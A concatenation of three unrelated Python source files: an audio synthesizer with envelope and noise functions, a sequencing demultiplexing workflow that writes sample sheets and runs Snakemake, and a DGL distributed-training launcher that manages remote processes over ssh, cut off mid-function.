SAMPLERATE = 44100 # default sample rate
def sine_wave(duration, frequency, ampl=1.0, samplerate=SAMPLERATE):
frames = int(duration * samplerate)
x = np.linspace(0, duration, frames)
assert len(x) == frames
return (0.5 * ampl) * np.sin(x * frequency * np.pi * 2)
def release_time(atk, dcy, samplelen, samplerate=SAMPLERATE):
return samplelen / samplerate * 1000 - (atk + dcy)
def envelope(attack_time, decay_time, sustain_level, release_time, frames):
assert isinstance(frames, int)
attack_frames = int(frames * attack_time)
decay_frames = int(frames * decay_time)
release_frames = int(frames * release_time)
sustain_frames = frames - attack_frames - decay_frames - release_frames
return np.concatenate([
np.linspace(0, 1, attack_frames),
np.linspace(1, sustain_level, decay_frames),
np.linspace(sustain_level, sustain_level, sustain_frames),
np.linspace(sustain_level, 0, release_frames),
])
def envelope_ms(attack_time, decay_time, sustain_level, release_time, frames, samplerate=SAMPLERATE):
assert isinstance(frames, int)
attack_frames = int(attack_time / 1000 * samplerate)
decay_frames = int(decay_time / 1000 * samplerate)
release_frames = int(release_time / 1000 * samplerate)
padding_frames = frames - attack_frames - decay_frames - release_frames
attack_frames = np.clip(attack_frames, 0, None)
decay_frames = np.clip(decay_frames, 0, None)
release_frames = np.clip(release_frames, 0, None)
padding_frames = np.clip(padding_frames, 0, None)
return np.concatenate([
np.linspace(0, 1, attack_frames),
np.linspace(1, sustain_level, decay_frames),
np.linspace(sustain_level, 0, release_frames),
np.linspace(0, 0, padding_frames)
])[:frames]
@lru_cache()
def lowpass_noise(cutoff, duration, samplerate=SAMPLERATE):
frames = int(duration*samplerate)
# # low pass filter implementation without fft
# # len(convolution) = len(signal) + len(kernel) - 1
# kernel_half_duration = 1
# t = np.linspace(
# -kernel_half_duration,
# kernel_half_duration,
# 2 * kernel_half_duration * samplerate
# )
# kernel = 2 * cutoff * np.sinc(2 * cutoff * t)
noise = np.random.normal(0, 0.2, frames)
fd_noise = np.fft.rfft(noise)
freq = np.fft.rfftfreq(noise.size, d=1/samplerate)
print(len(freq[freq < cutoff]))
fd_noise[freq > cutoff] = 0
noise = np.fft.irfft(fd_noise)
# noise = np.convolve(noise, kernel)
return noise
@lru_cache()
def bandpass_noise(cutoffl, cutoffh, duration, samplerate=SAMPLERATE):
frames = int(duration*samplerate)
noise = np.random.normal(0, 0.2, frames)
fd_noise = np.fft.rfft(noise)
freq = np.fft.rfftfreq(noise.size, d=1/samplerate)
fd_noise[freq < cutoffl] = 0
fd_noise[freq > cutoffh] = 0
noise = np.fft.irfft(fd_noise)
return noise
class Synth:
def __init__(self, output):
self.output = output
def play(self, *args):
self.play_mix(args)
def play_mix(self, mix):
concatenated = [np.concatenate(list(map(list, waves))) for waves in mix]
longest = len(max(concatenated, key=lambda x: len(x)))
for idx, ary in enumerate(concatenated):
zeros = np.zeros([longest-len(ary)])
concatenated[idx] = np.block([ary, zeros])
self.output.play_wave(sum(concatenated))
def play_wave(self, wave):
self.output.play_wave(wave)
class Queue0:
"""Bufferless Queue"""
def __init__(self):
self.mutex = threading.Lock()
self.not_empty = threading.Condition(self.mutex)
self.not_full = threading.Condition(self.mutex)
self.waiters = 0
self.data = []
def put(self, item, interrupt_delay=None):
with self.not_full:
while not self.waiters:
self.not_full.wait(timeout=interrupt_delay)
self.waiters -= 1
self.data.append(item)
self.not_empty.notify()
def get(self, interrupt_delay=None):
with self.not_empty:
self.waiters += 1
self.not_full.notify()
while not self.data:
self.not_empty.wait(timeout=interrupt_delay)
item = self.data.pop()
return item
def __iter__(self):
return self
def __next__(self):
return self.get()
class SoundcardOutput:
def __init__(self, speaker):
self.speaker = speaker
self.thread = None
def play_wave(self, wave):
self.queue.put(wave, interrupt_delay=0.1)
def __enter__(self):
if self.thread:
raise RuntimeError("already running")
self.queue = Queue0()
self.thread = threading.Thread(target=self._feed_thread, daemon=True)
self.thread.start()
return self
def __exit__(self, *args):
pass
def _feed_thread(self):
for item in self.queue:
self.speaker.play(item)
@contextmanager
def open_sc_stream(samplerate=SAMPLERATE, buffer_duration=1.0):
speaker = sc.default_speaker()
print(speaker)
blocksize = int(samplerate * buffer_duration)
with speaker.player(samplerate=samplerate, blocksize=blocksize) as player:
# player.channels = [-1]
with SoundcardOutput(player) as output:
yield output
class MyBuffer(bytearray):
def play_wave(self, data):
self.extend(np.int16(np.clip(data, -1, 1) * 32767))
def _write_wav_file(filename, sample_rate, stream):
with wave.open(filename, 'wb') as wf:
wf.setnchannels(1)
wf.setsampwidth(2)
wf.setframerate(sample_rate)
wf.setnframes(len(stream))
wf.writeframes(stream)
@contextmanager
def create_wav_file(filename, sample_rate=SAMPLERATE):
stream = MyBuffer()
try:
yield Synth(stream)
finally:
_write_wav_file(filename, sample_rate, stream)
@contextmanager
def open_soundcard_synth(sample_rate=SAMPLERATE):
with open_sc_stream() as stream:
yield Synth(stream)
def run_synth(callable, output=None, **kwargs):
if output is None:
context_function = open_soundcard_synth
elif isinstance(output, str):
context_function = partial(create_wav_file, output)
try:
with context_function(**kwargs) as synth:
callable(synth)
except KeyboardInterrupt:
pass
if __name__ == "__main__":
# TODO: use argparse
import sys
outfile = None
if len(sys.argv) >= 2:
scorename = sys.argv[1]
if len(sys.argv) == 3:
outfile = sys.argv[2]
# TODO: handle multiple scores with the same name
scorefile = next(f for f in Path('.').glob('**/*.py') if f.stem == scorename)
# scores/ezio/ezio0.py -> scores.ezio.ezio0
module = '.'.join([*scorefile.parent.parts, scorefile.stem])
run_synth(import_module(module).make_music, output=outfile)
|
workflow.py
|
"""Implementation of the workflow for demultiplexing sequencing directories."""
import collections
import csv
import glob
import gzip
import itertools
import json
import logging
import os
import shutil
import subprocess
import sys
from threading import Thread, Lock
import tempfile
import xml.etree.ElementTree as ET
from snakemake.exceptions import WorkflowError
from digestiflow_demux import __version__
from .bases_mask import split_bases_mask, return_bases_mask, BaseMaskConfigException
from .api_client import ApiClient, ApiException
from .exceptions import ApiProblemException, MissingOutputFile
#: Path to the Snakefile.
PATH_SNAKEFILE = os.path.abspath(os.path.join(os.path.dirname(__file__), "Snakefile"))
#: Template for the success message.
TPL_MSG_SUCCESS = r"""
The demultiplexing succeeded for flow cell {flowcell[vendor_id]}.
See the attached files for quality reports.
The following attachments were not present (this is OK for HTML reports that are not generated
by Picard):
{missing_log_files}
--
This message was auto-created by digestiflow-demux v{version}.
"""
#: Template for the failure message.
TPL_MSG_FAILURE = r"""
The attempted demultiplexing for flow cell {flowcell[vendor_id]} has failed.
To try again, clean up any output files and mark as "ready" for demultiplexing again.
--
This message was auto-created by digestiflow-demux v{version}.
"""
def write_sample_sheet_v1(writer, flowcell, libraries):
"""Write V1 sample sheet"""
header = [
"FCID",
"Lane",
"SampleID",
"SampleRef",
"Index",
"Description",
"Control",
"Recipe",
"Operator",
"SampleProject",
]
writer.writerow(header)
demux_reads = flowcell.get("demux_reads") or flowcell["planned_reads"]
demux_reads = split_bases_mask(demux_reads)
lens = [count for base, count in demux_reads if base == "B"]
recipe = "PE_indexing" if demux_reads.count("T") > 1 else "SE_indexing"
for lib in libraries:
if lib["barcode2"]:
barcode = "".join((lib["barcode"][: lens[0]], "-", lib["barcode2"][: lens[1]]))
else:
barcode = lib["barcode"][: lens[0]]
for lane in sorted(lib["lanes"]):
data = [
flowcell["vendor_id"],
lane,
lib["name"],
lib["reference"],
barcode,
"",
"N",
recipe,
flowcell["operator"],
"Project",
]
writer.writerow(list(map(str, data)))
def write_sample_sheets_v2(flowcell, libraries, output_dir):
"""Write V2 sample sheets. Write one sample sheet for each bases_mask in the config."""
# re-shuffle dict from lib - lane - bases_mask to bases_mask - lib
d = collections.defaultdict(dict)
for key, lib in enumerate(libraries):
d[lib.get("demux_reads_override", flowcell["demux_reads"])][key] = lib
for bases_mask, libraries in d.items():
os.makedirs(
os.path.join(output_dir, "illumina_basesmask/{}".format(bases_mask)), exist_ok=True
)
with open(
os.path.join(output_dir, "illumina_basesmask/{}/SampleSheet.csv".format(bases_mask)),
"w",
) as f:
writer = csv.writer(f, delimiter=",")
write_sample_sheet_v2(writer, flowcell, libraries.values())
def write_sample_sheet_v2(writer, flowcell, libraries):
"""Write V2 sample sheet"""
# Write [Data] Section
writer.writerow(["[Data]"])
dual_indexing = any(library["barcode2"] for library in libraries)
if dual_indexing:
writer.writerow(["lane", "sample_id", "index", "index2", "sample_project"])
else:
writer.writerow(["lane", "sample_id", "index", "sample_project"])
rows = []
for lib in libraries:
for lane in sorted(lib["lanes"]):
barcodes = lib["barcode"].split(",")
for barcode in barcodes:
row = [lane, lib["name"], barcode]
if dual_indexing:
row.append(lib["barcode2"])
row.append("Project")
rows.append(row)
for row in sorted(rows):
writer.writerow(list(map(str, row)))
def write_sample_sheet_picard(flowcell, libraries, output_dir):
"""Write picard sample sheets, one per lane."""
dual_indexing = any(library["barcode2"] for library in libraries)
if not dual_indexing:
head_barcodes = ["barcode_sequence_1", "barcode_name", "library_name"]
head_samplesheet = ["OUTPUT_PREFIX", "BARCODE_1"]
else:
head_barcodes = ["barcode_sequence_1", "barcode_sequence_2", "barcode_name", "library_name"]
head_samplesheet = ["OUTPUT_PREFIX", "BARCODE_1", "BARCODE_2"]
# re-shuffle dict from lib - lane - barcode to lane - lib - barcode because picard works on lanes
d = collections.defaultdict(dict)
for lib in libraries:
for lane in sorted(lib["lanes"]):
d[lane][lib["name"]] = lib
# add Undetermined to samplesheet as picard crashes otherwise
for lane in d:
d[lane]["Undetermined"] = {"name": "Undetermined", "barcode": "N", "barcode2": ""}
if dual_indexing:
d[lane]["Undetermined"]["barcode2"] = "N"
for lane, libraries in d.items():
barcode_rows = []
samples_rows = []
for lib in libraries.values():
output_prefix = "{lane}/{name}".format(
name=lib["name"], flowcell=flowcell["vendor_id"], lane=lane
)
if dual_indexing:
# we do not pass the barcodes names, so we use the sample name.
barcode_row = [lib["barcode"], lib["barcode2"], lib["name"], lib["name"]]
samples_row = [output_prefix, lib["barcode"], lib["barcode2"]]
else:
barcode_row = [lib["barcode"], lib["name"], lib["name"]]
samples_row = [output_prefix, lib["barcode"]]
# barcode file should not contain dummy for unbarcoded reads, but samplesheet must.
if not lib["name"] == "Undetermined":
barcode_rows.append(barcode_row)
samples_rows.append(samples_row)
os.makedirs(os.path.join(output_dir, "picard_barcodes/{}".format(lane)), exist_ok=True)
with open(
os.path.join(output_dir, "picard_barcodes/{}/barcodes.txt".format(lane)), "w"
) as bf, open(
os.path.join(output_dir, "picard_barcodes/{}/samplesheet.txt".format(lane)), "w"
) as sf:
barcodewriter = csv.writer(bf, delimiter="\t")
sampleswriter = csv.writer(sf, delimiter="\t")
barcodewriter.writerow(head_barcodes)
sampleswriter.writerow(head_samplesheet)
for row in sorted(barcode_rows):
barcodewriter.writerow(list(map(str, row)))
for row in sorted(samples_rows):
sampleswriter.writerow(list(map(str, row)))
def reverse_complement(seq):
"""Return reverse-complemented version of ``seq``."""
mapping = {"A": "T", "a": "t", "C": "G", "c": "g", "G": "C", "g": "c", "T": "A", "t": "a"}
return "".join(reversed([mapping.get(i, i) for i in seq]))
def load_run_info(path_run_info_xml):
"""Load information from ``RunInfo.xml`` file."""
with open(path_run_info_xml, "rt") as xmlf:
xmls = xmlf.read()
root = ET.fromstring(xmls)
tag_run = root.find("Run")
return {
"run_id": tag_run.attrib["Id"],
"instrument": tag_run.find("Instrument").text,
"run_no": tag_run.attrib["Number"],
"flowcell": tag_run.find("Flowcell").text,
}
def load_run_parameters(path_run_parameters_xml):
"""Load information from ``runParameters.xml`` file."""
with open(path_run_parameters_xml, "rt") as xmlf:
xmls = xmlf.read()
root = ET.fromstring(xmls.lower())
version_string = next(root.iter("rtaversion")).text
if version_string.startswith("v"):
version_string = version_string[1:]
rta_version = tuple(map(int, version_string.split(".")))
return {"rta_version": rta_version}
def remove_old_samplesheets(output_dir):
"""Remove old sample sheets so that snakemake does not get confused."""
fls = ["SampleSheet.csv", "picard_barcodes", "illumina_basesmask"]
fls = [os.path.join(output_dir, f) for f in fls]
for f in fls:
if os.path.isdir(f):
shutil.rmtree(f)
elif os.path.exists(f):
os.remove(f)
def create_sample_sheet(config, input_dir, output_dir): # noqa: C901
"""Query the Digestiflow API for the necessary information for building the sample sheet."""
logging.info("Perform API queries and create sample sheet")
client = ApiClient(
api_url=config.api_url, api_token=config.api_token, project_uuid=config.project_uuid
)
logging.debug("Parsing RunInfo.xml file")
run_info = load_run_info(os.path.join(input_dir, "RunInfo.xml"))
path_run_info = glob.glob(os.path.join(input_dir, "?un?arameters.xml"))[0]
run_parameters = load_run_parameters(path_run_info)
logging.debug("RTA version is: %s", run_parameters["rta_version"])
logging.debug("Querying API for flow cell")
try:
flowcell = client.flowcell_resolve(
instrument_id=run_info["instrument"],
run_no=run_info["run_no"],
flowcell_id=run_info["flowcell"],
)
except ApiException as e:
raise ApiProblemException("Problem querying API for flow cell") from e
if flowcell is None:
logging.warning("Could not resolve flow cell via API. Not proceeding.")
return None
if flowcell["status_conversion"] != "ready" and not config.force_demultiplexing:
logging.warning('Status is not "ready", will skip flow cell.')
return None
if not flowcell["libraries"]:
logging.warning("There are no libraries in flow cell. I'm refusing to continue.")
return None
if not config.api_read_only:
try:
client.flowcell_update(flowcell["sodar_uuid"], status_conversion="in_progress")
except ApiException as e:
raise ApiProblemException('Could not update conversion status to "in_progress"') from e
logging.debug("Querying API for sequencing machine information")
try:
sequencer = client.sequencer_retrieve(sequencer=run_info["instrument"])
except ApiException as e:
raise ApiProblemException("Problem querying API for sequencer") from e
logging.debug("Querying for barcode information")
libraries = []
demux_reads_override = set()
for library in flowcell["libraries"]:
if not library["lane_numbers"]:
continue # do not consider library any further
if library.get("barcode_seq"):
barcode_seq = library.get("barcode_seq")
elif library.get("barcode"):
try:
barcode = client.barcodesetentry_retrieve(barcodesetentry=library.get("barcode"))
except ApiException as e:
raise ApiProblemException("Problem querying API for barcode #1") from e
barcode_seq = barcode["sequence"]
else:
barcode_seq = ""
if library.get("barcode_seq2"):
barcode_seq2 = library.get("barcode_seq2")
elif library.get("barcode2"):
try:
barcode2 = client.barcodesetentry_retrieve(barcodesetentry=library.get("barcode2"))
except ApiException as e:
raise ApiProblemException("Problem querying API for barcode #2") from e
barcode_seq2 = barcode2["sequence"]
else:
barcode_seq2 = ""
if sequencer["dual_index_workflow"] == "B":
barcode_seq2 = reverse_complement(barcode_seq2)
if library["demux_reads"]:
demux_reads = library["demux_reads"]
else:
demux_reads = flowcell["demux_reads"] or flowcell["planned_reads"]
try:
demux_reads = return_bases_mask(flowcell["planned_reads"], demux_reads, "picard")
demux_reads_override.add(demux_reads)
except BaseMaskConfigException as e:
logging.warning("There is a problem with the bases mask. %s", e)
logging.exception(e, exc_info=True)
libraries.append(
{
"name": library["name"],
"reference": library["reference"],
"barcode": barcode_seq,
"barcode2": barcode_seq2,
"lanes": library["lane_numbers"],
"demux_reads_override": demux_reads,
}
)
# Get delivery type from flowcell information.
delivery_type = flowcell["delivery_type"].split("_")
# Normalize bases masks, decide if paired-end, find all custom bases_masks
planned_reads = flowcell["planned_reads"]
demux_reads = flowcell.get("demux_reads") or planned_reads
demux_reads = return_bases_mask(planned_reads, demux_reads, "picard")
flowcell["demux_reads"] = demux_reads # not used by bcl2fastq2
flowcell["demux_reads_override"] = list(sorted(demux_reads_override))
rta_version = run_parameters["rta_version"]
if "M" in flowcell["demux_reads"]: # TODO: refine condition
demux_tool = "picard"
elif config.demux_tool == "bcl2fastq" and rta_version >= (1, 18, 54):
demux_tool = "bcl2fastq2"
elif config.demux_tool == "bcl2fastq":
demux_tool = "bcl2fastq1"
else:
demux_tool = "picard"
logging.info("Using demux tool %s", demux_tool)
bcl2fastq2_params = {
"with_failed_reads": config.with_failed_reads,
"create_fastq_for_index_reads": flowcell["create_fastq_for_index_reads"],
"minimum_trimmed_read_length": flowcell["minimum_trimmed_read_length"],
"mask_short_adapter_reads": flowcell["mask_short_adapter_reads"],
}
logging.debug("Writing out demultiplexing configuration")
# Get barcode mismatch count or default.
if flowcell["barcode_mismatches"] is None:
if flowcell["rta_version"] == 1:
barcode_mismatches = 0
else:
barcode_mismatches = 1
else:
barcode_mismatches = flowcell["barcode_mismatches"]
with open(os.path.join(output_dir, "demux_config.json"), "wt") as jsonf:
config_json = {
"barcode_mismatches": barcode_mismatches,
"bcl2fastq2_params": bcl2fastq2_params,
"cores": config.cores,
"delivery_type": delivery_type,
"demux_tool": demux_tool,
"flowcell": {**flowcell, "libraries": libraries},
"input_dir": input_dir,
"lanes": config.lanes,
"output_dir": output_dir,
"rta_version": flowcell["rta_version"],
"tiles": config.tiles,
}
json.dump(config_json, jsonf)
logging.debug("Writing out sample sheet information")
remove_old_samplesheets(output_dir)
if demux_tool == "bcl2fastq1":
with open(os.path.join(output_dir, "SampleSheet.csv"), "wt") as csvf:
write_sample_sheet_v1(csv.writer(csvf), flowcell, libraries)
elif demux_tool == "picard":
write_sample_sheet_picard(flowcell, libraries, output_dir)
else:
write_sample_sheets_v2(flowcell, libraries, output_dir)
return flowcell # Everything is fine
def send_flowcell_success_message(client, flowcell, output_dir, *log_files):
if "seq" in flowcell["delivery_type"]:
# Remove log files that do not exist.
existing_log_files = [p for p in log_files if os.path.exists(p)]
missing_log_files = [p for p in log_files if not os.path.exists(p)]
# Create renamed (and potentially compressed files
path_in = os.path.join(output_dir, "multiqc/multiqc_%s")
with tempfile.TemporaryDirectory() as tempdir:
path_out = os.path.join(tempdir, "MultiQC_%%s_%s.%%s" % flowcell["vendor_id"])
with open(path_in % "report.html", "rb") as f_in:
with gzip.open(path_out % ("Report", "html.gz"), "wb") as f_out:
shutil.copyfileobj(f_in, f_out)
shutil.copyfile(path_in % "data.zip", path_out % ("Data", "zip"))
# Post with renamed files.
return client.message_send(
flowcell_uuid=flowcell["sodar_uuid"],
subject="Demultiplexing succeeded for flow cell %s" % flowcell["vendor_id"],
body=TPL_MSG_SUCCESS.format(
flowcell=flowcell,
version=__version__,
missing_log_files="\n".join(missing_log_files) or "none; all found",
),
attachments=list(
itertools.chain(
[path_out % ("Report", "html.gz"), path_out % ("Data", "zip")],
existing_log_files,
)
),
)
else:
# No sequences generated, no MultiQC created.
return client.message_send(
flowcell_uuid=flowcell["sodar_uuid"],
subject="Demultiplexing succeeded for flow cell %s" % flowcell["vendor_id"],
body=TPL_MSG_SUCCESS.format(flowcell=flowcell, version=__version__),
attachments=list(log_files),
)
def send_flowcell_failure_message(client, flowcell, *log_files):
return client.message_send(
flowcell_uuid=flowcell["sodar_uuid"],
subject="Demultiplexing FAILED for flow cell %s" % flowcell["vendor_id"],
body=TPL_MSG_FAILURE.format(flowcell=flowcell, version=__version__),
attachments=log_files,
)
def async_tee_pipe(process, input_file, out_file, out_file2, mutex):
"""Async tee-piping from input_file to two output files using the mutex."""
logging_thread = Thread(target=tee_pipe, args=(process, input_file, out_file, out_file2, mutex))
logging_thread.start()
return logging_thread
def tee_pipe(process, input_file, out_file, out_stream, mutex):
"""Tee-piping from input_file to two output files using the mutex."""
while 1:
line = input_file.readline()
if not line and process.poll() is not None:
break
else:
with mutex:
out_stream.write(line.decode("utf-8"))
out_file.write(line)
def launch_snakemake(config, flowcell, output_dir, work_dir):
"""Launch Snakemake and execute the demultiplexing"""
logging.info("Temporary directory is %s", work_dir)
logging.info("Start Snakemake workflow for demultiplexing")
client = ApiClient(
api_url=config.api_url, api_token=config.api_token, project_uuid=config.project_uuid
)
output_log_dir = os.path.join(output_dir, "log")
output_qc_dir = os.path.join(output_dir, "multiqc")
drmaa_log_dirs = [
os.path.join(output_log_dir, "digestiflow-demux-snakemake.log.gz"),
os.path.join(output_log_dir, "digestiflow-demux.log"),
]
if "seq" in flowcell["delivery_type"]:
drmaa_log_dirs += [
os.path.join(output_qc_dir, "multiqc_data.zip"),
os.path.join(output_qc_dir, "multiqc_report.html"),
]
if config.only_post_message:
for path in drmaa_log_dirs:
if not os.path.exists(path):
raise MissingOutputFile("Cannot post message with %s missing" % path)
if config.only_post_message:
logging.info("Only posting message, not running demultiplexing itself.")
failure = False
else:
argv = [
"--snakefile",
PATH_SNAKEFILE,
"--directory",
work_dir,
"--configfile",
os.path.join(output_dir, "demux_config.json"),
"--cores",
config.cores,
"--drmaa-log-dir",
output_log_dir,
"--max-jobs-per-second",
config.max_jobs_per_second,
"--use-conda",
"--config",
]
if config.jobscript:
argv += ["--jobscript", config.jobscript]
if config.verbose:
argv += ["--verbose", "--printshellcmds"]
if config.drmaa:
argv += ["--drmaa", config.drmaa]
if config.cluster_config:
argv += ["--cluster-config", config.cluster_config]
argv = list(map(str, argv))
logging.info("Executing: snakemake %s", " ".join(argv))
try:
# Launch Snakemake
proc = subprocess.Popen(
["snakemake"] + argv, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
# Write output to temporary log file, to be attached later.
log_file_path = os.path.join(config.log_path, "digestiflow-demux-snakemake.log.gz")
with gzip.open(log_file_path, "wb") as log_file:
mutex = Lock()
logger_stderr = async_tee_pipe(proc, proc.stderr, log_file, sys.stderr, mutex)
logger_stdout = async_tee_pipe(proc, proc.stdout, log_file, sys.stdout, mutex)
logger_stderr.join()
logger_stdout.join()
# Copy out log file to log directory.
os.makedirs(output_log_dir, exist_ok=True)
shutil.copy(log_file_path, output_log_dir)
failure = proc.returncode != 0
except WorkflowError as e:
logging.warning("Running demultiplexing failed: %s", e)
failure = True
# Paths to tarballs with Illumina HTML reports.
paths_html_reports = [
os.path.join(output_dir, "html_report_%s.tar.gz" % bases_mask)
for bases_mask in flowcell["demux_reads_override"]
]
if not failure and not config.api_read_only:
message = send_flowcell_success_message(
client, flowcell, output_dir, log_file_path, *paths_html_reports
)
logging.info("Marking flowcell as complete...")
try:
client.flowcell_update(flowcell["sodar_uuid"], status_conversion="complete")
except ApiException as e:
logging.warning("Could not update conversion state to complete via API: %s", e)
logging.info("Done running Snakemake.")
elif flowcell and not config.api_read_only:
message = send_flowcell_failure_message(client, flowcell, log_file_path)
logging.info("Marking flowcell as failed...")
try:
client.flowcell_update(flowcell["sodar_uuid"], status_conversion="failed")
except ApiException as e:
logging.warning("Could not update conversion state to failed via API: %s", e)
else:
message = None
return (not failure, message, flowcell, client)
def perform_demultiplexing(config, input_dir, output_dir):
"""Prepare and execute the demultiplexing with the Snakemake workflow."""
logging.info("Starting to process input directory %s", input_dir)
logging.info("Output will go to %s", output_dir)
logging.debug("Creating output directory %s", output_dir)
os.makedirs(output_dir, exist_ok=True)
flowcell = create_sample_sheet(config, input_dir, output_dir)
if not flowcell:
return False, None, None, None
if config.work_dir:
logging.info("Using work directory %s", config.work_dir)
return launch_snakemake(config, flowcell, output_dir, config.work_dir)
elif config.keep_work_dir:
logging.info("Setup non-temporary work directory")
return launch_snakemake(config, flowcell, output_dir, tempfile.mkdtemp("-cubi-demux"))
else:
logging.info("Setup temporary work directory")
with tempfile.TemporaryDirectory("-cubi-demux") as work_dir:
return launch_snakemake(config, flowcell, output_dir, work_dir)
|
launch.py
|
"""Launching tool for DGL distributed training"""
import os
import stat
import sys
import subprocess
import argparse
import signal
import logging
import time
import json
import multiprocessing
import re
from functools import partial
from threading import Thread
from typing import Optional
DEFAULT_PORT = 30050
def cleanup_proc(get_all_remote_pids, conn):
'''This process tries to clean up the remote training tasks.
'''
print('cleanupu process runs')
# This process should not handle SIGINT.
signal.signal(signal.SIGINT, signal.SIG_IGN)
data = conn.recv()
# If the launch process exits normally, this process doesn't need to do anything.
if data == 'exit':
sys.exit(0)
else:
remote_pids = get_all_remote_pids()
# Otherwise, we need to ssh to each machine and kill the training jobs.
for (ip, port), pids in remote_pids.items():
kill_process(ip, port, pids)
print('cleanup process exits')
def kill_process(ip, port, pids):
'''ssh to a remote machine and kill the specified processes.
'''
curr_pid = os.getpid()
killed_pids = []
# If we kill child processes first, the parent process may create more again. This happens
# to Python's process pool. After sorting, we always kill parent processes first.
pids.sort()
for pid in pids:
assert curr_pid != pid
print('kill process {} on {}:{}'.format(pid, ip, port), flush=True)
kill_cmd = 'ssh -o StrictHostKeyChecking=no -p ' + str(port) + ' ' + ip + ' \'kill {}\''.format(pid)
subprocess.run(kill_cmd, shell=True)
killed_pids.append(pid)
# It's possible that some of the processes are not killed. Let's try again.
for i in range(3):
killed_pids = get_killed_pids(ip, port, killed_pids)
if len(killed_pids) == 0:
break
else:
killed_pids.sort()
for pid in killed_pids:
print('kill process {} on {}:{}'.format(pid, ip, port), flush=True)
kill_cmd = 'ssh -o StrictHostKeyChecking=no -p ' + str(port) + ' ' + ip + ' \'kill -9 {}\''.format(pid)
subprocess.run(kill_cmd, shell=True)
def get_killed_pids(ip, port, killed_pids):
'''Get the process IDs that we want to kill but are still alive.
'''
killed_pids = [str(pid) for pid in killed_pids]
killed_pids = ','.join(killed_pids)
ps_cmd = 'ssh -o StrictHostKeyChecking=no -p ' + str(port) + ' ' + ip + ' \'ps -p {} -h\''.format(killed_pids)
res = subprocess.run(ps_cmd, shell=True, stdout=subprocess.PIPE)
pids = []
for p in res.stdout.decode('utf-8').split('\n'):
l = p.split()
if len(l) > 0:
pids.append(int(l[0]))
return pids
def execute_remote(
cmd: str,
ip: str,
port: int,
username: Optional[str] = ""
) -> Thread:
"""Execute command line on remote machine via ssh.
Args:
cmd: User-defined command (udf) to execute on the remote host.
ip: The ip-address of the host to run the command on.
port: Port number that the host is listening on.
thread_list:
username: Optional. If given, this will specify a username to use when issuing commands over SSH.
Useful when your infra requires you to explicitly specify a username to avoid permission issues.
Returns:
thread: The Thread whose run() is to run the `cmd` on the remote host. Returns when the cmd completes
on the remote host.
"""
ip_prefix = ""
if username:
ip_prefix += "{username}@".format(username=username)
# Construct ssh command that executes `cmd` on the remote host
ssh_cmd = "ssh -o StrictHostKeyChecking=no -p {port} {ip_prefix}{ip} '{cmd}'".format(
port=str(port),
ip_prefix=ip_prefix,
ip=ip,
cmd=cmd,
)
# thread func to run the job
def run(ssh_cmd):
subprocess.check_call(ssh_cmd, shell=True)
thread = Thread(target=run, args=(ssh_cmd,))
thread.setDaemon(True)
thread.start()
return thread
def get_remote_pids(ip, port, cmd_regex):
"""Get the process IDs that run the command in the remote machine.
"""
pids = []
curr_pid = os.getpid()
# Here we want to get the python processes. We may get some ssh processes, so we should filter them out.
ps_cmd = 'ssh -o StrictHostKeyChecking=no -p ' + str(port) + ' ' + ip + ' \'ps -aux | grep python | grep -v StrictHostKeyChecking\''
res = subprocess.run(ps_cmd, shell=True, stdout=subprocess.PIPE)
for p in res.stdout.decode('utf-8').split('\n'):
l = p.split()
if len(l) < 2:
continue
# We only get the processes that run the specified command.
res = re.search(cmd_regex, p)
if res is not None and int(l[1]) != curr_pid:
pids.append(l[1])
pid_str = ','.join([str(pid) for pid in pids])
ps_cmd = 'ssh -o StrictHostKeyChecking=no -p ' + str(port) + ' ' + ip + ' \'pgrep -P {}\''.format(pid_str)
res = subprocess.run(ps_cmd, shell=True, stdout=subprocess.PIPE)
pids1 = res.stdout.decode('utf-8').split('\n')
all_pids = []
for pid in set(pids + pids1):
if pid == '' or int(pid) == curr_pid:
continue
all_pids.append(int(pid))
all_pids.sort()
return all_pids
def get_all_remote_pids(hosts, ssh_port, udf_command):
'''Get all remote processes.
'''
remote_pids = {}
for node_id, host in enumerate(hosts):
ip, _ = host
# When creating training processes in remote machines, we may insert some arguments
# in the commands. We need to use regular expressions to match the modified command.
cmds = udf_command.split()
new_udf_command = ' .*'.join(cmds)
pids = get_remote_pids(ip, ssh_port, new_udf_command)
remote_pids[(ip, ssh_port)] = pids
return remote_pids
def construct_torch_dist_launcher_cmd(
num_trainers: int,
num_nodes: int,
node_rank: int,
master_addr: str,
master_port: int
) -> str:
"""Constructs the torch distributed launcher command.
Helper function.
Args:
num_trainers:
num_nodes:
node_rank:
master_addr:
master_port:
Returns:
cmd_str.
"""
torch_cmd_template = "-m torch.distributed.launch " \
"--nproc_per_node={nproc_per_node} " \
"--nnodes={nnodes} " \
"--node_rank={node_rank} " \
"--master_addr={master_addr} " \
"--master_port={master_port}"
return torch_cmd_template.format(
nproc_per_node=num_trainers,
nnodes=num_nodes,
node_rank=node_rank,
master_addr=master_addr,
master_port=master_port
)
def wrap_udf_in_torch_dist_launcher(
udf_command: str,
num_trainers: int,
num_nodes: int,
node_rank: int,
master_addr: str,
master_port: int,
) -> str:
"""Wraps the user-defined function (udf_command) with the torch.distributed.launch module.
Example: if udf_command is "python3 run/some/trainer.py arg1 arg2", then new_df_command becomes:
"python3 -m torch.distributed.launch <TORCH DIST ARGS> run/some/trainer.py arg1 arg2
udf_command is assumed to consist of pre-commands (optional) followed by the python launcher script (required):
Examples:
# simple
python3.7 path/to/some/trainer.py arg1 arg2
# multi-commands
(cd some/dir && python3.7 path/to/some/trainer.py arg1 arg2)
IMPORTANT: If udf_command consists of multiple python commands, then this will result in undefined behavior.
Args:
udf_command:
num_trainers:
num_nodes:
node_rank:
master_addr:
master_port:
Returns:
"""
torch_dist_cmd = construct_torch_dist_launcher_cmd(
num_trainers=num_trainers,
num_nodes=num_nodes,
node_rank=node_rank,
master_addr=master_addr,
master_port=master_port
)
# Auto-detect the python binary that kicks off the distributed trainer code.
# Note: This allowlist order matters, this will match with the FIRST matching entry. Thus, please add names to this
# from most-specific to least-specific order eg:
# (python3.7, python3.8) -> (python3)
# The allowed python versions are from this: https://www.dgl.ai/pages/start.html
python_bin_allowlist = (
"python3.6", "python3.7", "python3.8", "python3.9", "python3",
# for backwards compatibility, accept python2 but technically DGL is a py3 library, so this is not recommended
"python2.7", "python2",
)
# If none of the candidate python bins match, then we go with the default `python`
python_bin = "python"
for candidate_python_bin in python_bin_allowlist:
if candidate_python_bin in udf_command:
python_bin = candidate_python_bin
break
# transforms the udf_command from:
# python path/to/dist_trainer.py arg0 arg1
# to:
